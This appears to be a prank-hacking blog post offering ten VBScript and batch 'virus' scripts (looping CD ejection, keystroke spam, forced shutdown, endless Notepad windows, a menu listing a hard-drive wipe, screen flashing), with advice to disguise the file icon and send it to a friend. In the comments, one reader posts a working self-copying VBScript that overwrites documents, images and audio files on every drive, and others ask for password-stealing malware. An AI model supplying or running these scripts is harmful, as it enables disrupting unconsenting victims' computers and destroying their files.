10 virus notepad script


All this comand use to type in notepad

1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

2) Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

10) THRETEN BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a

To disable error (ctrl+shirt+esc) then end process wscript.exe
Enjoy!!!^^

50 comments:

emile said...

Hey! Those are cool viruses. Do you think you could make me a prank pacman virus that closes all windows, a pacman eats all files on the home screen, leaving only a picture, and it resets in 2 hours.
Me and my friend want to prank this kid. my email is "millio.szabo@gmail.com"
thx

mathijskindermans said...

how can i stop the virus ?? number 1 with your cd rom thing

mathijskindermans said...

how can i stop the virus number 1 with your cdrom

me said...

Hey awesome viruses they work really well could you send me a freeze virus that stays frozen even if u shut it down
Thanks ALOT
Just send me the script at r2d2droidsw@gmail.com

Anonymous said...

is it the same to stop all viruses or are there different buttons we have go press to deactivate

Anonymous said...
This comment has been removed by the author.
Anonymous said...
This comment has been removed by the author.
chris said...

these are not viruses they are just enoying or dangerouse scripts and batches a real virus can copy itself if you want a real virus that can infect other files then type this code and save as a .vbs
this is the code:
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
For Each d In fso.Drives
If d.DriveType + 2 And d.IsReady = True Then
Call SubFolders(d & "\")
End If
Next

Function infect(path)
On Error Resume Next
Set fold = fso.GetFolder(path)
For Each f In fold.Files
ext = fso.GetExtensionName(f.path)
If (ext="doc") or (ext="txt") or (ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") or (ext="js") or (ext="mp2") or (ext="mp3") or (ext="vbs") or (ext="vbe") or (ext="jpeg") or (ext="jpg") Then
fso.CopyFile WScript.ScriptFullName, f.path & ".vbs", True
fso.DeleteFile f.Path, True
End if
Next
End Function

Function SubFolders(path)
On Error Resume next
For Each subf In fso.GetFolder(path).SubFolders
Call Infect(subf.Path)
Call SubFolders(subf.Path)
next
End function
save as .vbs
this virus overwrites files with these extentions:.doc,.txt,.js,.jse,.css,.wsh,.sct,.hta,.js,.mp2,.mp3 ,.vbs,.vbe,.jpeg,.jpg i am NOT responsible for any damage caused by this virus so PLEASE DO NOT RUN THIS SCRIPT UNLESS YOU WANT DATA LOSS

chris said...
This comment has been removed by the author.
King said...

Can you please help me and create a virus code to disable dvd rom on windows 7 using notepad. my brother use to watch porn. and i want to stop the drive so that he will stop it please anyone.

Unknown said...

simple go to your hardware device and disable the DVD drive

FWBlogger said...

VBS Autorun Worm Tutorial

http://my-tech-site.blogspot.com/2011/10/this-is-basic-framework-of-vbs-autorun.html

Unknown said...

how to i stop the first one? i accidentally opened it and its really annoying?

FWBlogger said...

@jess morgan
Open Taskmanager and end the process called "wscript.exe"

Unknown said...

hiiii pls say me how to stop continous opening notepad..??? pls say me my system is very slow in process after running it...

FWBlogger said...

@Vignesh
You have to end the process called CMD.EXE

Unknown said...

hey if i send as an attached file with a message when he will read the message the virus will automatically start up?

FWBlogger said...
This comment has been removed by the author.
FWBlogger said...

@keshav Sharma,

Emails these days, don't allow vbs files as attachments because in 2001, a mass-mailer virus called 'i-love-you' or 'loveletter' caused havoc.
AFAIK, they don't even allow VBS inside a zip file. Even if you managed to do so, it wouldn't run itself.
Internet Explorer displays a security warning pop-up if it finds a VBScript code embedded in the 'script' section of the HTML source of some webpage.
And access to FileSystemObject also results in the same warning.
The user must accept to run the script himself which he is very unlikely to do.

Hart said...

Solution of 1st CD-Drive Remove is Given below text type in notepad & than save it to Anti.vbs & Run it . .

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = colCDRoMs.Count to colCDROMs.Count + 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Unknown said...

i tried many of them on my pc and nothing happened

Unknown said...

nothing is happening when i tried it on my pc

Anonymous said...

www.blogginaboutstuffz.wordpress.com

Believe me, it will be worth it...

Unknown said...

in the last of every code you ritten "send it" where should send it this is my email address"mzahirmohammad@gmail.com" thanks

Unknown said...

Hey this is not viruses! These are scary waaa I want to do it to myself so I did it and I was FREAKED OUT! Plz I hope no real virus comes to my comp............

So guys don't keep these cool virus affects for too long!.

Unknown said...

Every time I open the VBS notepad scary thing all it does it open it to edit the code. How can I just make it open and not edit. Reply here...

Unknown said...

How To Stop There Effects on aby Computer???
pls Suggest
Good Scripts Although..!!

Unknown said...

Deselect "read only" in Properties. Then it will run when selected.

Gokul Raam said...

Can I stop this Virus if I delete the file?

Unknown said...

technology becomming powerful.

Ravi Chilwant said...

CAN YOU PLEASE TELL ME ANY WAY TO DIRECTLY COPY THE ALL DOCUMENTS FROM REMOVABLE DRIVE TO MY PC AUTOMATICALLY IF ANYONE CONNECTED TO IT.

Anonymous said...

heyy man those viruses worked sickly ....but i have one challenge for you ......if its alright because your basically a pro can you please TRY and make a virus that when someone opens it the virus copys all of there passwords and sends it back. NEW YEAR DUDE and i know your getting better!! best of luck my email is superhacker1221@gmail.com
thanks man, your the best

Unknown said...

I NEED MORE

Unknown said...

nice post very useful thanks for share click here

surgicaloperation said...

Thanks admin nice post Immediately Visit Now

Technical Sunsar said...

Hey Gyes Look My Site Its Interesting It has Many Hacking ,virus maker,etc softwares and tutorial. www.hackingtoolsandscripts.blogspot.com

Anonymous said...

Hi does it matter which key you press to get the screen to stop doing blinky colors

Librarian said...

wonderfull i like it very much i applied it on my computer 1st and i succied to remove these viruse

Unknown said...

Thanks for sharing like my prank.
https://youtu.be/XH9rfa9ginQ

Anonymous said...

Great Post , Thanks for sharing Great Post .I Will be back often to check up on new stuff you post cloud computing public sector

Pradipta said...

Hey can u plz provide me a cool vb script which will freak and amaze my friends at the same time my id is cricketnext24@gmail.com

Pradipta said...

Hey can u plz provide me a cool vb script which will freak and amaze my friends at the same time my id is cricketnext24@gmail.com

Shrlyn_shree said...

Hey, can u tell me exactly when this file will execute? Just after we have saved it or when will'l double click it to open it?

Shrlyn_shree said...

Hey, can u tell me exactly when this file will execute? Just after we have saved it or when will'l double click it to open it?

Unknown said...

ohh no my Anti virus detected all of them then after that it shutdown my computer dude don't run this one :)

Unknown said...

you can even make a samll shutdown virus by just putting this code taht is
shutdown -s-t 10-c"type anything you want"
save as anyting .bat

Mihai Florea said...

How to make an ENTER (next row) at 5) ? (the possessed notepad)

I WANT TO KNOW :D

Unknown said...

This is really awesome and beautiful.
Thank for this sharing.
Custom office notepads

Prem said...

hey in the cd virus can i decrease the wscript.sleep ((((5000)))) this value so the cd drive will go in and out fast

Prem said...

flash screennot working in wndows 7 bro

Official Free Search Engine Submission